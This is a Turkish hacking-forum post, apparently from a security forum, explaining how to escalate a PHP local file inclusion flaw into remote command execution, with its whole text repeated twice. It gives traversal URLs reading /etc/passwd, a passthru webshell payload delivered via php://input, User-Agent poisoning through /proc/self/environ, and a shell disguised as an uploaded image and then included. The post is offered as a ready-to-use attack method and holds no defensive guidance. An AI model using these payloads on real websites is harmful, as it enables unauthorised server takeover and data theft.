Selam beyler ve hanımefendiler. Forumu kurcaladım fakat LFI ile php komut çalıştırma adına bir konu bulamadım. Bu yüzden ben bildiğim kadarıyla size anlatmaya çalışacağım. Görsel kullanmayacağım kusura bakmayın şimdiden.
LFI açığını hepimiz biliyoruzdur. Hedef sistemdeki yerel bir dosyayı Bulunduğunuz sayfaya yansıtmayı sağlar.
Php de buna sebep olan şey include($_GET['page']) ile hiç bir koruma yapmadan almak falandır genelde.
Örnek vermek gerekirse;
"http://webserverdeneme.comm/main.php?page=index.php" normal bir url dir.
Ancak siz index.php yerine normalde ulaşamayacağınız bir dosyasının adını yazabilirsiniz:
"http://webserverdeneme.comm/main.php?page=../../../../../etc/passwd"
sonuç:
root:x:0:0::/root:/bin/bash
bin:x:1:1::/:/sbin/nologin
daemon:x:2:2::/:/sbin/nologin
mail:x:3:3::/var/spool/mail:/sbin/nologin
....
gördüğünüz gibi bu kadar basit bir işlem. Şimdi sıra bunu kullanarak sistemde komut çalıştırmada...
Bildiğim birkaç yöntem ;
Yöntem 1:
"http://webserverdeneme.comm/main.php?cmd=whoami&page=php://input()" url ine POST verisi olarak "<?php passthru($_GET['cmd']); ?>" yollayarak webshell çalıştırabilirsiniz.
Yöntem 2:
"http://webserverdeneme.comm/main.php?page=/proc/self/environ" adresine gidin eğer user agent bilginiz orada bulunuyorsa user-agent'inizi "<?php passthru($_GET['cmd']); ?>" yaparsanız yine ?cmd= ile kod çalıştırabilirsiniz.
Yöntem 3:
Eğer sitede profil fotoğrafi - pdf dosya vs yükleme yeri bulursanız kullancağınız yöntemdir. Bu çok kişinin aklına gelmez bile.
Dosyanızı ya da fotoğrafınızı yüklerken isteği burp ile tutun. Uzantısını-MIME TYPE ını ya da headerini( datanın ilk satırları olur genelde ) ASLA DEĞİŞTİRMEYİN. Datanın En başından 2 3 satır kalsın, gerisini silip php kodunuzu ya da istediğiniz webshell in kodlarını yazın ve upload edin. Ben yine yukardaki cmd shell i yazacağım. Fotoğrafa tıkladığınızda bozuk gösterecektir ya da phpshell çalışmayacaktır.
Ardından LFI açıklı olan sayfaya gelip o fotoğrafın oluduğu konumu ?page= parametresine yazın
Örnek:
"http://webserverdeneme.comm/main.php?cmd=whoami&page=/uploads/photo.jpg"
Sayfaya gittiğinizde sonuç döndüğünü görmelisiniz. Eğer sonuç dönmüyorsa CTRL+U yapıp sayfa kaynağından kontrol edin. Disable_Functions etkin değilse shell imiz çalışacaktır. Normalde Foto olarak yüklediğimiz shell çalışmazken. Php sayfadan include edince çalıştı çünkü sistem onu jpg olarak algılamadı. içindeki kodlar php cgi tarafından çalıştırıldı.
LFI açığını hepimiz biliyoruzdur. Hedef sistemdeki yerel bir dosyayı Bulunduğunuz sayfaya yansıtmayı sağlar.
Php de buna sebep olan şey include($_GET['page']) ile hiç bir koruma yapmadan almak falandır genelde.
Örnek vermek gerekirse;
"http://webserverdeneme.comm/main.php?page=index.php" normal bir url dir.
Ancak siz index.php yerine normalde ulaşamayacağınız bir dosyasının adını yazabilirsiniz:
"http://webserverdeneme.comm/main.php?page=../../../../../etc/passwd"
sonuç:
root:x:0:0::/root:/bin/bash
bin:x:1:1::/:/sbin/nologin
daemon:x:2:2::/:/sbin/nologin
mail:x:3:3::/var/spool/mail:/sbin/nologin
....
gördüğünüz gibi bu kadar basit bir işlem. Şimdi sıra bunu kullanarak sistemde komut çalıştırmada...
Bildiğim birkaç yöntem ;
Yöntem 1:
"http://webserverdeneme.comm/main.php?cmd=whoami&page=php://input()" url ine POST verisi olarak "<?php passthru($_GET['cmd']); ?>" yollayarak webshell çalıştırabilirsiniz.
Yöntem 2:
"http://webserverdeneme.comm/main.php?page=/proc/self/environ" adresine gidin eğer user agent bilginiz orada bulunuyorsa user-agent'inizi "<?php passthru($_GET['cmd']); ?>" yaparsanız yine ?cmd= ile kod çalıştırabilirsiniz.
Yöntem 3:
Eğer sitede profil fotoğrafi - pdf dosya vs yükleme yeri bulursanız kullancağınız yöntemdir. Bu çok kişinin aklına gelmez bile.
Dosyanızı ya da fotoğrafınızı yüklerken isteği burp ile tutun. Uzantısını-MIME TYPE ını ya da headerini( datanın ilk satırları olur genelde ) ASLA DEĞİŞTİRMEYİN. Datanın En başından 2 3 satır kalsın, gerisini silip php kodunuzu ya da istediğiniz webshell in kodlarını yazın ve upload edin. Ben yine yukardaki cmd shell i yazacağım. Fotoğrafa tıkladığınızda bozuk gösterecektir ya da phpshell çalışmayacaktır.
Ardından LFI açıklı olan sayfaya gelip o fotoğrafın oluduğu konumu ?page= parametresine yazın
Örnek:
"http://webserverdeneme.comm/main.php?cmd=whoami&page=/uploads/photo.jpg"
Sayfaya gittiğinizde sonuç döndüğünü görmelisiniz. Eğer sonuç dönmüyorsa CTRL+U yapıp sayfa kaynağından kontrol edin. Disable_Functions etkin değilse shell imiz çalışacaktır. Normalde Foto olarak yüklediğimiz shell çalışmazken. Php sayfadan include edince çalıştı çünkü sistem onu jpg olarak algılamadı. içindeki kodlar php cgi tarafından çalıştırıldı.
SON
sağlıcakla kalın
sağlıcakla kalın